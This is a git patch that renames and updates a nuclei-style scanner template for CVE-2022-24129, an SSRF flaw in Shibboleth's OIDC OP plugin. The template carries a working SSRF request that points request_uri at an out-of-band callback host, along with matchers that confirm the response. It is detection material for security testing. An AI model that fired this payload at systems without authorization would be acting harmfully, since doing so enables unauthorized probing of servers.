From 7f407a95b295bcc8f7dd0919020226c23c8f8a59 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 5 Jul 2022 08:09:14 +0530 Subject: [PATCH] Update and rename CVE-2022-24129.yaml to cves/2022/CVE-2022-24129.yaml --- CVE-2022-24129.yaml => cves/2022/CVE-2022-24129.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) rename CVE-2022-24129.yaml => cves/2022/CVE-2022-24129.yaml (74%) diff --git a/CVE-2022-24129.yaml b/cves/2022/CVE-2022-24129.yaml similarity index 74% rename from CVE-2022-24129.yaml rename to cves/2022/CVE-2022-24129.yaml index 470f065f9c..46199ade93 100644 --- a/CVE-2022-24129.yaml +++ b/cves/2022/CVE-2022-24129.yaml @@ -1,27 +1,34 @@ id: CVE-2022-24129 info: - name: OIDC OP plugin <3.0.4 Shibboleth - Server-Side Request Forgery + name: Shibboleth OIDC OP plugin <3.0.4 - Server-Side Request Forgery author: 0x_Akoko severity: high description: The OIDC OP plugin before 3.0.4 for Shibboleth Identity Provider allows server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter. This allows attackers to interact with arbitrary third-party HTTP services. reference: - https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF + - https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP - https://nvd.nist.gov/vuln/detail/CVE-2022-24129 - tags: ssrf,cve,cve2022,oidc,shibboleth classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N cvss-score: 8.2 cve-id: CVE-2022-24129 cwe-id: CWE-918 + tags: cve,cve2022,ssrf,oidc,shibboleth requests: - method: GET path: - '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}' + matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" + + - type: word + part: interactsh_request + words: + - "ShibbolethIdp"